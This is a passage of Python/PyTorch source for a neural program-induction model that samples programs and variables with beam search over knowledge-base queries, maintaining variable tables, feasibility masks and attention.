#true_program_sample is a tensor of shape beam_size x batch_size
# _____________________________________________________________________________
###############################################################################
# =============================================================================
# checking if any beam has terminated
for prog_samples, beam_id in zip(list(torch.unbind(true_program_sample, dim = 0)), xrange(self.beam_size)):
beam_properties['terminate'][beam_id] = self.terminate_net(prog_samples, beam_properties['terminate'][beam_id])
#update the length
beam_properties['length'][beam_id] = beam_properties['length'][beam_id] + (1.0-beam_properties['terminate'][beam_id])
beam_properties['none_count'][beam_id] = self.none_finder_net(prog_samples)
# _____________________________________________________________________________
###############################################################################
# =============================================================================
# getting the actual variable samples
# beam_properties['input_var_sampled_indices'] is a list of length beam_size with
# tensor of shape [batch_size x num_programs_to_sample x num_variables_to_sample]
multiplicand_1 = torch.stack(beam_properties['input_var_sampled_indices'], dim = 0)
multiplicand_2 = torch.unsqueeze(self.one_hot(pointer_to_prog_sample, depth = self.num_programs_to_sample, dtype=multiplicand_1.dtype), dim = 3)
flattened_input_var_sample = torch.sum(torch.mul(multiplicand_1, multiplicand_2),dim = 2)
# flattened_input_var_sample has shape [beam_size x batch_size x num_variables_to_sample]
multiplicand_1 = flattened_input_var_sample
multiplicand_2 = self.one_hot(pointer_to_variable_sample, depth = self.num_variables_to_sample, dtype=multiplicand_1.dtype)
flattened_input_var_sample = torch.sum(torch.mul(multiplicand_1, multiplicand_2), dim = 2)
# flattened_input_var_sample has shape [beam_size x batch_size]
actual_var_samples_list = self.map_index_to_unflattened(flattened_input_var_sample, \
[self.max_num_var for _ in xrange(self.max_arguments)])
# is a max_arguments sized list containing tensors of shape [beam_size x batch_size]
# this contains the actual variable samples
#print 'actual_var_samples_list ', actual_var_samples_list
actual_var_samples_list = list(torch.unbind(torch.stack(actual_var_samples_list,dim = 2).type(self.dtype_int64), dim = 0))
# actual_var_samples_list is a list of beam_size length containing tensors of shape [batch_size x max_arguments]
# _____________________________________________________________________________
###############################################################################
# =============================================================================
# Code For Preventing step repetition in generated trajectories
# need to do a scatter update on 'program_argument_table_index' and set used steps to 0
index_0 = torch.arange(0, self.beam_size*self.batch_size, device=self.device, dtype=self.dtype_int64)
# index_0 has shape [(beam_size*batch_size)]
index_1 = true_program_sample.view([-1])
# index_1 has shape [(beam_size*batch_size)]
index_2 = flattened_input_var_sample.view([-1])
# index_2 has shape [(beam_size*batch_size)]
new_value = torch.ones_like(index_1, device=self.device)
b1 = (index_1==torch.zeros_like(index_1, device=self.device)).type(self.dtype_float)
b2 = (index_1==(self.num_progs-1)*torch.ones_like(index_1, device=self.device)).type(self.dtype_float)
new_value = torch.where(torch.max(b1,b2)>0, new_value, 0*new_value)
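# Note (descriptive only): new_value is 1 for the special programs (None = 0 and terminate =
# num_progs-1) and 0 otherwise, so the scatter below zeroes out the (program, argument-combination)
# entry that was just used; ordinary steps cannot be repeated, while None/terminate stay available.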
old_property_value = torch.stack(beam_properties['program_argument_table_index'], dim = 0)
# old_property_value has shape beam_size x batch_size x num_progs x (max_arguments*max_num_var)
old_property_value = old_property_value.view([-1, self.num_progs, int(math.pow(self.max_num_var,self.max_arguments))])
index_for_scatter = torch.stack([index_0, index_1, index_2], dim = 1)
old_property_value = self.immutable_scatter_nd_constant_update(old_property_value, index_for_scatter, new_value)
old_property_value = old_property_value.view([self.beam_size, self.batch_size, self.num_progs,\
int(math.pow(self.max_num_var,self.max_arguments))])
beam_properties['program_argument_table_index'] = torch.unbind(old_property_value)
true_program_sample = true_program_sample.type(self.dtype_int64)
# _____________________________________________________________________________
###############################################################################
# =============================================================================
# returning the program samples and similar stuff
for beam_id, true_prog_samples, true_var_samples in zip(xrange(self.beam_size),\
list(torch.unbind(true_program_sample)), actual_var_samples_list):
to_return_action_sequence['program_type'][beam_id].append(true_prog_samples)
arg_types, argtype_embedding = self.argument_type_net(true_prog_samples)
to_return_action_sequence['argument_type'][beam_id].append(torch.transpose(arg_types, 1,0))
to_return_action_sequence['argument_table_index'][beam_id].append(true_var_samples)
#with tf.device('/cpu:0'):
target_types = torch.index_select(self.program_to_targettype_table, 0, true_prog_samples)
to_return_action_sequence['target_type'][beam_id].append(target_types)
# =============================================================================
# need to track current target program type so that we can terminate if gold type occurs
condition = torch.max((target_types==torch.zeros_like(target_types, device=self.device)).type(self.dtype_float), (target_types==(self.num_progs-1)*torch.ones_like(target_types, device=self.device)).type(self.dtype_float))
beam_properties['target_type'][beam_id] = torch.where(condition>0., beam_properties['target_type'][beam_id].type(self.dtype_int64), target_types)
# _____________________________________________________________________________
prog_sampled_embeddings = self.program_embedding(true_prog_samples)
argtypes = list(torch.unbind(arg_types, dim=0))
var_embed = [self.manual_gather_nd(self.variable_embedding[beam_id], torch.stack([argtypes[i], self.batch_ids], dim=1)) \
for i in xrange(self.max_arguments)]
#var_embed is a max_arguments sized list of batch_size x max_num_var x var_embed_dim
var_sample = list(torch.unbind(true_var_samples, dim = 1))
# var_sample is a max_arguments sized list of tensors of shape batch_size
var_sample_index = [torch.stack([self.batch_ids, var_sample[i]], dim=1) for i in range(self.max_arguments)]
input_var_embedding = [self.manual_gather_nd(var_embed[i], var_sample_index[i]) for i in xrange(self.max_arguments)]
num_variables_till_now, R_Flag = self.get_num_variables_till_now(beam_id, target_types)
[target_var_key, \
beam_properties['target_var_embedding'][beam_id]] = self.target_var_net(input_var_embedding, \
argtype_embedding, \
prog_sampled_embeddings, num_variables_till_now, \
target_types)
self.add_to_variable_table(target_types, target_var_key,\
beam_properties['target_var_embedding'][beam_id], \
num_variables_till_now, beam_id = beam_id)
# =============================================================================
# whenever any variable table overflows we need to give negative reward for that
beam_properties['Model_Reward_Flag'][beam_id] = beam_properties['Model_Reward_Flag'][beam_id]+R_Flag
# _____________________________________________________________________________
to_return_action_sequence['target_table_index'][beam_id].append(num_variables_till_now)
# _____________________________________________________________________________
###############################################################################
# reshaping stuff so that it can be handled by main function
for beam_id in xrange(self.beam_size):
for i in xrange(self.num_timesteps):
to_return_action_sequence['argument_table_index'][beam_id][i] = list(torch.unbind(\
to_return_action_sequence['argument_table_index'][beam_id][i],dim = 0))
# =============================================================================
#setting the Model Reward FLAG
to_return_action_sequence['Model_Reward_Flag'] = beam_properties['Model_Reward_Flag']
# _____________________________________________________________________________
###############################################################################
# to_return_action_sequence['argument_table_index'] is a list of length beam_size containing a list of
# length num_timesteps containing a list of max argument length with tensors of shape batch size
self.ProgramProb = torch.exp(to_return_sequence_logprob)
self.logProgramProb = to_return_sequence_logprob
self.per_step_prob = to_return_per_step_prob
self.entropy = self.entropy/self.num_timesteps
# print 100*'%'
# print beam_properties['target_type']
# print beam_properties['terminate']
# print self.gold_target_type
# print beam_properties['check_penalization']
# print 100*'%'
return to_return_action_sequence, torch.exp(to_return_sequence_logprob), \
to_return_sequence_logprob, self.debug_beam_terminate, to_return_per_step_prob, self.entropy/self.num_timesteps
def get_feasible_progs(self, timestep, phase_elasticity):
num_variables = [torch.transpose(torch.sum(self.variable_mask[i], dim=2, dtype=self.dtype_int64), 1,0) for i in range(len(self.variable_mask))]
#num_variables is a beam_size sized list of dimension batch_size x num_argtypes
num_variables_remaining = [self.required_argtypes - num_variables[i] for i in range(len(self.variable_mask))]
num_variables_remaining = [torch.where(num_variables_remaining[i]>0, num_variables_remaining[i], torch.zeros_like(num_variables_remaining[i], device=self.device)) for i in range(len(self.variable_mask))]
num_variables_remaining = [torch.unsqueeze(num_variables_remaining[i], 1).repeat([1, self.num_progs, 1]) for i in range(len(self.variable_mask))]
program_to_targettype_onehot = self.one_hot(self.program_to_targettype_table, depth=self.num_argtypes)
#program_to_targettype_onehot is of dimension num_progs x num_argtypes
# print num_variables_remaining[0].dtype,program_to_targettype_onehot.dtype
reqd_programs = [torch.max(torch.mul(num_variables_remaining[i], program_to_targettype_onehot), dim=2)[0].type(self.dtype_float) for i in range(len(self.variable_mask))]
#reqd_programs is a beam_size sized list of dimension batch_size x num_progs
#self.program_to_num_arguments is of dimension num_progs x num_argtypes
num_variable_types = [torch.max(self.variable_mask[i], dim=2)[0].type(self.dtype_int64) for i in range(len(self.variable_mask))]
#num_variable_types is a beam_size sized list of dimension num_argtypes x batch_size
num_variable_types = [torch.unsqueeze(num_variable_types[i],dim=0).repeat([self.num_progs,1,1]).permute([2,0,1]) for i in \
range(len(self.variable_mask))]
#num_variable_types is a beam_size sized list of dimension batch_size x num_progs x num_argtypes
feasible_progs = [torch.where(num_variable_types[i]>=self.program_to_num_arguments, \
torch.ones_like(num_variable_types[i], device=self.device), torch.zeros_like(num_variable_types[i], device=self.device)) \
for i in range(len(self.variable_mask))]
#feasible_progs is of dimension batch_size x num_progs x num_argtypes
feasible_progs = [torch.prod(feasible_progs[i], dim=2).type(self.dtype_float) for i in range(len(self.variable_mask))]
#feasible_progs is of dimension batch_size x num_progs
program_to_kb_attention = torch.max(self.kb_attention, dim=2)[0]
feasible_progs = [torch.mul(program_to_kb_attention, feasible_progs[i]) for i in range(len(self.variable_mask))]
def separate_phases(arg):
feasible_prog = arg[0]
phase_elasticity = arg[1]
if timestep < self.max_num_phase_1_steps:
temp = phase_elasticity.repeat([1,self.num_progs])
multiplicand1 = self.progs_phase_1.type(self.dtype_float)
else:
temp = (1-phase_elasticity).repeat([1,self.num_progs])
multiplicand1 = self.progs_phase_2.type(self.dtype_float)
multiplicand2 = 1 - multiplicand1
multiplicand = torch.mul(temp, multiplicand1) + torch.mul(1-temp, multiplicand2)
feasible_prog = torch.mul(feasible_prog, multiplicand)
return feasible_prog
feasible_progs = map(separate_phases, zip(feasible_progs,phase_elasticity))
# =============================================================================
# Hard Rules
temp = self.one_hot(torch.zeros([self.batch_size], device=self.device), depth=self.num_progs, dtype=self.dtype_float)
feasible_progs = [temp + (1-temp)*feasible_progs[i] for i in range(len(self.variable_mask))]
if timestep == 0:
def make_none_impossible(prog_mask):
temp = self.one_hot(torch.zeros([self.batch_size], device=self.device), depth = self.num_progs, dtype=self.dtype_float)
new_mask = -1*temp + (1-temp)
prog_mask = torch.mul(new_mask, prog_mask)
return prog_mask
feasible_progs = map(make_none_impossible,feasible_progs)
# _____________________________________________________________________________
#print 'feasible progs ', [feasible_progs[i] for i in range(len(self.variable_mask))]
#print 'feasible_progs[i]+reqd_programs[i] ', [feasible_progs[i]+reqd_programs[i] for i in range(len(self.variable_mask))]
feasible_progs_new = [torch.where(feasible_progs[i]>0, feasible_progs[i]+reqd_programs[i], feasible_progs[i]) for i in range(len(self.variable_mask))]
feasible_progs = [torch.mul(self.bias_prog_sampling_with_target, feasible_progs_new[i]) + torch.mul((1.0-self.bias_prog_sampling_with_target), feasible_progs[i]) for i in range(len(self.variable_mask))]
return feasible_progs
def add_preprocessed_output_to_variable_table(self, beam_id):
R_Flag = torch.zeros([self.batch_size], device=self.device)
for i in xrange(self.num_argtypes):
if i==self.empty_argtype_id:
continue
for j in xrange(self.max_num_var):
ones = i*torch.ones([1, self.batch_size], dtype=self.dtype_int64, device=self.device)
empties = self.empty_argtype_id*torch.ones([self.max_arguments-1, self.batch_size], dtype=self.dtype_int64, device=self.device)
argtype = torch.cat([ones, empties], dim=0)
#argtype is of dimension max_arguments x batch_size
argtype_embed = self.argtype_embedding(argtype)
input_var_embedding = torch.unsqueeze(torch.matmul(self.preprocessed_var_emb_table[i][j], self.preprocessed_var_emb_mat), dim=0)
#input_var_embedding is of dimension 1 x batch_size x var_embed_dim
zeros_embedding = torch.zeros([self.max_arguments-1, self.batch_size, self.var_embed_dim], device=self.device)
input_var_embedding = torch.cat([input_var_embedding, zeros_embedding], dim=0)
#input_var_embedding is of dimension max_arguments x batch_size x var_embed_dim
target_types = i*torch.ones([self.batch_size], device=self.device, dtype=self.dtype_int64)
num_variables_till_now, cur_r_flag = self.get_num_variables_till_now(beam_id, target_types)
[target_var_key, \
target_var_embedding] = self.target_var_net_for_preprocessed_output(input_var_embedding, argtype_embed, num_variables_till_now, target_types)
#target_types is of dimension batch_size
self.add_to_variable_table(target_types, target_var_key, target_var_embedding, num_variables_till_now, beam_id = beam_id)
R_Flag = R_Flag + cur_r_flag
# once variable props from preprocessing are copied to main variable table
# update main variable mask. Initialize main variable mask with the masks in preprocessed variable mask table
self.variable_mask[beam_id] = torch.stack([torch.stack(temp, dim = 1) for temp in \
self.preprocessed_var_mask_table], dim = 0)
self.variable_atten_table[beam_id] = list(torch.unbind(self.variable_mask[beam_id]+0))
return R_Flag
def sentence_encoder(self):
sentence_outputs = None
rnn_inputs_w2v = self.word_embeddings(self.encoder_text_inputs_w2v)
rnn_inputs_kb_emb = self.encoder_text_inputs_kb_emb
rnn_inputs = torch.cat([rnn_inputs_w2v, rnn_inputs_kb_emb], dim = 2)
init_state = torch.unsqueeze(self.init_state.repeat([self.batch_size, 1]), dim=0)
# print(rnn_inputs.shape, init_state.shape)  # debug
sentence_outputs, states = self.sentence_rnn(rnn_inputs, init_state)
attention_states = torch.transpose(sentence_outputs.view([self.batch_size,self.max_len,-1]), 1,0)
#attention_states is of dimension max_len x batch_size x cell_dim
return states, attention_states
def get_feasible_progs_for_last_timestep(self):
gold_type = self.gold_target_type
#gold_type is of dimension batch_size
gold_type = torch.unsqueeze(gold_type, dim=1).repeat([1, self.num_progs])
#gold_type is of dimension batch_size x num_progs
feasible_progs_for_last_timestep = torch.where((gold_type==self.program_to_targettype_table), torch.ones_like(gold_type, device=self.device), torch.zeros_like(gold_type, device=self.device))
#feasible_progs_for_last_timestep is of dimension batch_size x num_progs
return feasible_progs_for_last_timestep
def attention_on_relations(self, attention_states):
attention_states = torch.matmul(torch.matmul(attention_states, self.query_rel_atten), torch.transpose(self.rel_embedding,1,0))
attention_states = torch.sum(attention_states, dim=0)
attention_states = nn.functional.softmax(attention_states, dim=1)
#attention_states is of dimension batch_size x num_rel
return attention_states
def attention_on_types(self, attention_states):
attention_states = torch.matmul(torch.matmul(attention_states, self.query_type_atten), torch.transpose(self.type_embedding,1,0))
attention_states = torch.sum(attention_states, dim=0)
attention_states = nn.functional.softmax(attention_states, dim=1)
return attention_states
def reset_state(self, sentence_state):
zero_state = torch.zeros([self.batch_size, self.npi_core_dim],device=self.device)
h_states = zero_state
e_state = self.dropout(self.elu(self.reset_layer(sentence_state)))
target_var_embedding = torch.zeros([self.batch_size, self.var_embed_dim],device=self.device)
h_states = torch.unsqueeze(h_states, dim=0)
return h_states, e_state, target_var_embedding
def npi_core(self, h_state, e_state, target_var_embedding):
s_in = torch.unsqueeze(self.state_encoding(e_state, target_var_embedding), dim=0)
#s_in is of dimension 1 x batch_size x state_dim
target_var_embedding = torch.unsqueeze(target_var_embedding, dim=0)
c = torch.cat([s_in, target_var_embedding], dim=2)
#c is of dimension 1 x batch_size x (state_dim + var_embed_dim)
#c = torch.transpose(c, 1,0)
h_state, c = self.npi_rnn(c, h_state)
#h_state is of dimension batch_size x npi_core_dim
return c, h_state
def env_encoding(self, e_state, target_var_embedding):
c = torch.unsqueeze(target_var_embedding,dim=0)
#c is of dimension 1 x batch_size x var_embed_dim
#c = torch.transpose(c, 1,0)
c, e_state = self.env_rnn(c, e_state)
return c, e_state
def state_encoding(self, e_state, target_var_embedding):
merge = torch.cat([e_state.view([self.batch_size, -1]), target_var_embedding], dim=1)
#merge is of dimension batch_size x (self.npi_core_dim+var_embed_dim)
elu = self.dropout(self.elu(self.state_encoding_layer1(merge)))
#elu is of dimension batch_size x hidden_dim
elu = self.dropout(self.elu(self.state_encoding_layer2(elu)))
#elu is of dimension batch_size x hidden_dim
out = self.dropout(self.elu(self.state_encoding_layer3(elu)))
#out is of dimension batch_size x state_dim
return out
def terminate_net(self, progs_taken, old_terminate):
temp1 = torch.ones_like(progs_taken, device=self.device, dtype=self.dtype_int64)
temp2 = torch.zeros_like(progs_taken, device=self.device, dtype=self.dtype_int64)
# num_progs-1 is the terminate action
terminate = torch.where((progs_taken==self.num_progs-1), temp1, temp2)
terminate = terminate.view([self.batch_size, 1]).type(old_terminate.dtype)
terminate = torch.where(terminate>=old_terminate, terminate, old_terminate)
return terminate
# this will return tensor of shape batch_size x 1
def none_finder_net(self, progs_taken):
temp1 = torch.ones_like(progs_taken, device=self.device)
temp2 = torch.zeros_like(progs_taken, device=self.device)
# 0 is the None action
out = torch.where((progs_taken==0), temp1, temp2)
out = out.view([self.batch_size, 1])
return out
# this will return tensor of shape batch_size x 1
def check_if_gold_target(self, beam_target_type, beam_gold_type, if_terminated, t):
mask_same_type = torch.where((beam_target_type==beam_gold_type), torch.zeros_like(beam_target_type, device=self.device), \
torch.ones_like(beam_target_type, device=self.device)).type(self.dtype_float)
if t < self.num_timesteps-1:
return torch.mul(mask_same_type,if_terminated)
else:
return mask_same_type
def phase_change_net(self, h, timestep, old_p_el):
if timestep < self.max_num_phase_1_steps:
p_el = self.dropout(self.phase_change_layer(h))
p_el = torch.sigmoid(p_el)
p_el = torch.where(p_el>old_p_el, old_p_el, p_el)
temp = torch.ones_like(p_el, device=self.device)
p_el = torch.where(p_el>self.phase_change_threshold, temp, p_el)
return p_el
else:
temp = torch.zeros_like(old_p_el, device=self.device)
return temp
def prog_net(self, h, sentence_state, attention_states, query_attentions_till_now, feasible_progs, num_samples, terminate, last_target_type):
#print 'feasible progs', feasible_progs
#feasible_progs is of shape batch_size x num_progs
# variable_mask beam_size x [num_argtypes, batch_size, max_num_var]
#self.program_to_argtype_table is of dimension num_progs x max_arguments
#last_target_type is of dimension batch_size
last_target_type = last_target_type.view([-1,1,1]).repeat(1,self.num_progs, self.max_arguments)
programs_consuming_last_targettype = torch.max(torch.where((self.program_to_argtype_table==last_target_type),\
torch.ones_like(last_target_type, dtype=self.dtype_int64, device=self.device), torch.zeros_like(last_target_type, device=self.device)), dim=2)[0].type(self.dtype_float)
feasible_progs_new = torch.where(feasible_progs>0, feasible_progs+ programs_consuming_last_targettype, feasible_progs)
feasible_progs = torch.mul(self.bias_prog_sampling_with_last_variable, feasible_progs_new) + torch.mul((1.0-self.bias_prog_sampling_with_target), feasible_progs)
#programs_consuming_last_targettype is of dimension batch_size x num_progs
#feasible_progs is of dimension batch_size x num_progs
if self.concat_query_npistate:
concat_hq = torch.cat([h, sentence_state], dim=1)
else:
concat_hq = h
concat_hq = concat_hq.view([self.batch_size, -1])
if self.query_attention:
query_attention = torch.mul(attention_states, torch.mul(h, self.query_attention_h_mat))
#temp is of dimension max_len x batch_size x cell_dim
query_attention = nn.functional.softmax(torch.sum(query_attention, dim=2), dim=0)
#query_attention is of dimension max_len x batch_size
if self.dont_look_back_attention:
query_attentions_till_now = torch.transpose(query_attentions_till_now, 1,0)
query_attention = nn.functional.softmax(torch.mul(1.-query_attentions_till_now, query_attention), dim=0)
query_attentions_till_now = nn.functional.softmax(query_attentions_till_now+query_attention, dim=0)
query_attentions_till_now = torch.transpose(query_attentions_till_now, 1,0)
query_attention = torch.unsqueeze(query_attention, dim=2)
query_attention = torch.sum(torch.mul(query_attention, attention_states), dim=0)
concat_hq = torch.cat([concat_hq, query_attention], dim=1)
hidden = self.dropout(self.prog_key_layer1(concat_hq))
key = self.dropout(self.prog_key_layer2(hidden))
key = key.view([-1, 1, self.prog_key_dim])
prog_sim = torch.mul(key, self.program_keys)
prog_dist = torch.sum(prog_sim, 2)
prog_dist = nn.functional.softmax(prog_dist, dim=1)
if self.params['terminate_prog'] is True:
temp = self.one_hot((self.num_progs-1)*torch.ones([self.batch_size], device=self.device), depth=self.num_progs, dtype=self.dtype_float)
feasible_progs = terminate*temp + (1-terminate)*feasible_progs
prog_dist = torch.mul(prog_dist, feasible_progs)
#prog_dist is of dimension batch_size x num_progs
prog_sampled_probs, prog_sampled_indices = self.bernoulli_program_sampling(prog_dist, num_samples)
prog_sampled_probs = torch.div(prog_sampled_probs,torch.sum(torch.clamp(prog_dist,0,1), dim=1, keepdim=True))
# prog_sampled_probs is a tensor of shape batch_size x num_samples
# prog_sampled_indices is a tensor of shape batch_size x num_samples
prog_sampled_embeddings = self.program_embedding(prog_sampled_indices)
# prog_sampled_embeddings is a tensor of shape batch_size x num_samples x prog_embed_dim
list_program_sample_index = list(torch.unbind(prog_sampled_indices,dim=1))
# list_program_sample_index is a num_samples length list composed of batch_size sized tensors
kb_attention_for_sampled_progs = []
for prog_sample_index in list_program_sample_index:
prog_sample_index = torch.stack([self.batch_ids, prog_sample_index], dim=1)
kb_attention_for_sampled_progs.append(self.manual_gather_nd(self.kb_attention, prog_sample_index))
# kb_attention_for_sampled_progs is a num_samples length list composed of batch_size x max_var x max_var x max_var sized tensors
return prog_sampled_probs, prog_sampled_indices, prog_sampled_embeddings, \
torch.stack(kb_attention_for_sampled_progs, dim = 0), query_attentions_till_now
def argument_type_net(self, prog_sample):
#with tf.device('/cpu:0'):
arg_types = torch.index_select(self.program_to_argtype_table, 0, prog_sample)
# argtypes is of dimension batch_size x max_arguments
# argtypes is a list of argument types for that sampled program
# in order to handle different-length argtypes in a batch,
# assume every program has at most max_arguments arguments (with padding whenever necessary)
argtype_embedding = self.argtype_embedding(arg_types)
#argtype_embeddign is of dimension batch_size x max_arguments x argtype_embed_dim
arg_types = torch.transpose(arg_types, 1,0)
argtype_embedding = torch.transpose(argtype_embedding, 1,0)
#argtype_embeddign is of dimension max_arguments x batch_size x argtype_embed_dim
return arg_types, argtype_embedding
def input_var_net(self, h, arg_types, prog_sample, prog_embedding, kb_attention, beam_id, num_samples, terminate, past_program_variables):
#prog_sample is of batch_size
target_types = torch.index_select(self.program_to_targettype_table, 0, prog_sample)
# targettypes is of dimension batch_size
argtypes = list(torch.unbind(arg_types, dim=0))
# argtypes is a max_arguments sized list of dimension batch_size each
local_var_atten = torch.stack(self.variable_atten_table[beam_id], dim=0)
#with tf.device('/cpu:0'):
var_atten = [self.manual_gather_nd(local_var_atten,torch.stack([argtypes[i], self.batch_ids], dim=1)) \
for i in xrange(self.max_arguments)]
# var_atten is a max_arguments sized list of batch_size x max_num_var
#with tf.device('/cpu:0'):
var_mask = [self.manual_gather_nd(self.variable_mask[beam_id],torch.stack([argtypes[i], self.batch_ids], dim=1)) \
for i in xrange(self.max_arguments)]
# var_mask is a max_arguments sized list of batch_size x max_num_var
var_atten = [self.update_attention(var_atten[i], h, i) for i in range(self.max_arguments)]
var_atten = [self.mask_attention(var_atten[i], var_mask[i]) for i in xrange(self.max_arguments)]
# var_atten is a max_arguments sized list of batch_size x max_num_var
#with tf.device('/cpu:0'):
var_keys = [self.manual_gather_nd(self.variable_keys[beam_id], torch.stack([argtypes[i], self.batch_ids], dim=1)) \
for i in xrange(self.max_arguments)]
# var_keys is a max_arguments sized list of batch_size x max_num_var x var_key_dim
# var_atten is a max_arguments sized list of batch_size x max_num_var
key = [self.dropout(self.elu(self.inp_var_key_layer(var_atten[i]))) for i in xrange(self.max_arguments)]
key = [key[i].view([-1, 1, self.var_key_dim]) for i in xrange(self.max_arguments)]
var_sim = [torch.mul(key[i], var_keys[i]) for i in xrange(self.max_arguments)]
# var_sim is of dimension batch_size x max_num_var x var_key_dim
var_dist = [torch.sum(var_sim[i], 2) for i in xrange(self.max_arguments)]
var_dist = [nn.functional.softmax(var_dist[i], dim=1) for i in xrange(self.max_arguments)]
var_dist = [torch.mul(var_dist[i],var_mask[i]) for i in xrange(self.max_arguments)]
# var_dist is a max_arguments sized list of dimension batch_size x max_num_var
# we have to get the joint distribution over the different arguments.
var_dist = torch.stack(var_dist,dim=1)
#var_mask is of dimension batch_size x max_arguments x max_num_var
split_var_dist = list(torch.unbind(var_dist, dim=0))
# split_var_dist is a batch_size sized list of dimension max_arguments x max_num_var
joint_var_dist = []
for _var_dist_ in split_var_dist:
list_vectors_dist = list(torch.unbind(_var_dist_,dim=0))
joint_var_dist.append(self.recursive_joint_prob_generator(list_vectors_dist))
joint_var_dist = torch.stack(joint_var_dist,dim=0)
flattened_joint_var_dist = joint_var_dist.view([self.batch_size,-1])
flattened_joint_var_dist = torch.mul(flattened_joint_var_dist, kb_attention)
flattened_joint_var_dist = torch.mul(flattened_joint_var_dist, past_program_variables)
# =============================================================================
# ensuring an all-zero variable probability vector is handled appropriately
marker = torch.mean(flattened_joint_var_dist,dim = 1, keepdim=True)
marker = torch.where((marker==0), 0*torch.ones_like(marker, device=self.device), torch.ones_like(marker, device=self.device))
flattened_joint_var_dist = self.mask_attention(flattened_joint_var_dist, torch.ones_like(flattened_joint_var_dist, device=self.device))
flattened_joint_var_dist = torch.mul(flattened_joint_var_dist, marker)
# ______________________________________________________________________________
var_sampled_probs, var_sampled_indices = torch.topk(flattened_joint_var_dist, k = num_samples)
# var_sampled_probs is a tensor of shape batch_size x num_samples
# var_sampled_indices is a tensor of shape batch_size x num_samples
return var_sampled_probs, var_sampled_indices, target_types
def get_num_variables_till_now(self, beam_id, targettypes):
t = torch.stack([targettypes.type(self.dtype_int64), self.batch_ids], dim=1)
var_mask = self.manual_gather_nd(self.variable_mask[beam_id], t)
# var_mask is of dimension batch_size x max_num_var
num_variables_till_now = torch.sum(var_mask, dim=1).type(self.dtype_int64)
# num_variables_till_now = num_variables_till_now.type(self.dtype_int64)
# num_variables_till_now is of dimension batch_size
# =================================================================================================================
# for None arg_type we should always ensure there is only one element in table to have consistent probabilities
# 0 is none type
num_variables_till_now = torch.where(targettypes==0, torch.zeros_like(num_variables_till_now, device=self.device), num_variables_till_now)
# =================================================================================================================
# =============================================================================
# Return a negative reward if table overpopulates
temp = (self.max_num_var-1) * torch.ones_like(num_variables_till_now, device=self.device)
R_Flag = torch.zeros_like(num_variables_till_now, device=self.device, dtype=self.dtype_float)
R_Flag = torch.where(num_variables_till_now > temp, 1+R_Flag, R_Flag)
# Overpopulation - overwrite the last entry in the table
num_variables_till_now = torch.where(num_variables_till_now > temp, temp, num_variables_till_now)
return num_variables_till_now, R_Flag
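# Illustrative example (hypothetical sizes, not from the config): with max_num_var = 5 and all five
# slots of the target type already filled, num_variables_till_now = 5 > 4, so R_Flag becomes 1 and
# the index is clamped to 4, i.e. the newest variable overwrites the last table entry.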
def target_var_net(self, input_var_embedding, argtype_embedding, prog_embedding, num_variables_till_now, target_type):
var_embedding = torch.stack(input_var_embedding, dim=0)
#var_embedding is of dimension max_arguments x batch_size x var_embed_dim
argument_type_embedding = argtype_embedding
#argument_type_embedding is of dimension max_arguments x batch_size x argtype_embed_dim
target_var_key, target_var_embedding = self.get_target_var_key_and_embedding(var_embedding, \
prog_embedding, \
argument_type_embedding, \
num_variables_till_now, target_type)
#prog_embedding is of dimension batch_size x prog_embed_dim
#target_var_embedding is of dimension batch_size x var_embed_dim
#target_var_key is of dimension batch_size x var_key_dim
return target_var_key, target_var_embedding
def target_var_net_for_preprocessed_output(self, input_var_embedding, argtype_embedding, num_variables_till_now, target_type):
[target_var_key, \
target_var_embedding] = self.get_target_var_key_and_embedding(input_var_embedding, None, argtype_embedding, num_variables_till_now, target_type)
return target_var_key, target_var_embedding
def add_to_variable_table(self, targettypes, target_var_key, target_var_embedding, num_variables_till_now, beam_id = None):
# =============================================================================
indices_to_update = torch.stack([targettypes, self.batch_ids, num_variables_till_now], dim=1)
# indices_to_update is of dimension batch_size x 3
# variable_mask is of dimension num_argtypes x batch_size x max_num_var
mask_value_to_update = torch.ones([self.batch_size], device=self.device)
self.variable_mask[beam_id] = self.immutable_scatter_nd_constant_update(self.variable_mask[beam_id], \
indices_to_update, mask_value_to_update)
# variable_mask is of dimension num_argtypes x batch_size x max_num_var
self.variable_keys[beam_id] = self.immutable_scatter_nd_1d_update(self.variable_keys[beam_id], \
indices_to_update, target_var_key)
# self.variable_keys is of dimension num_argtypes x batch_size x max_num_var x var_key_dim
self.variable_embedding[beam_id] = self.immutable_scatter_nd_1d_update(self.variable_embedding[beam_id], \
indices_to_update, target_var_embedding)
# self.variable_embedding is of dimension num_argtypes x batch_size x max_num_var x var_embed_dim
#### VARIABLE_ATTENTION TABLE ALSO NEEDS TO BE UPDATED (SO THAT THE NEWLY ADDED ROW DOES NOT GET 0 ATTENTION)
local_var_atten = torch.stack(self.variable_atten_table[beam_id], dim=0)
# local_var_atten has shape = [self.num_argtypes, self.batch_size, self.max_num_var]
local_var_atten = self.immutable_scatter_nd_constant_update(local_var_atten, indices_to_update, mask_value_to_update)
self.variable_atten_table[beam_id] = list(torch.unbind(torch.nn.functional.normalize(local_var_atten,p=1, dim = 2), dim = 0))
def get_target_var_key_and_embedding(self, var_embedding, prog_embedding, argtype_embedding, num_variables_till_now, target_type):
#var_embedding is of dimension max_arguments x batch_size x var_embed_dim
#prog_embedding is of dimension batch_size x prog_embed_dim
#argtype_embedding is of dimension max_arguments x batch_size x argtype_embed_dim
#target_var_embedding is batch_size x var_embed_dim
#var_embedding and prog_embedding may be None
if prog_embedding is None:
prog_embedding = torch.zeros([self.batch_size, self.prog_embed_dim], device=self.device)
list_argtype_embedding = list(torch.unbind(argtype_embedding, dim = 0))
input_1 = list_argtype_embedding[0]
input_2 = list_argtype_embedding[1]
for current_argtype_id in range(len(list_argtype_embedding)):
input_1 = self.dropout(self.elu(self.target_var_key_and_embedding_arg_layer[current_argtype_id](torch.cat([input_1,input_2],dim=1))))
# temp = torch.cat([input_1,input_2],dim=1)
# input_1 = self.target_var_key_and_embedding_arg_layer[current_argtype_id](temp)
if current_argtype_id + 2 > len(list_argtype_embedding)-1:
break
input_2 = list_argtype_embedding[current_argtype_id+2]
l2_input_1 = input_1
list_var_embedding = list(torch.unbind(var_embedding, dim = 0))
input_1 = list_var_embedding[0]
input_2 = list_var_embedding[1]
for current_var_id in range(len(list_var_embedding)):
input_1 = self.dropout(self.elu(self.target_var_key_and_embedding_var_layer[current_var_id](torch.cat([input_1, input_2],dim=1))))
if current_var_id + 2 > len(list_var_embedding)-1:
break
input_2 = list_var_embedding[current_var_id+2]
l2_input_2 = input_1
l2_input_3 = prog_embedding
l2_input = torch.cat([l2_input_1,l2_input_2,l2_input_3],dim=1)
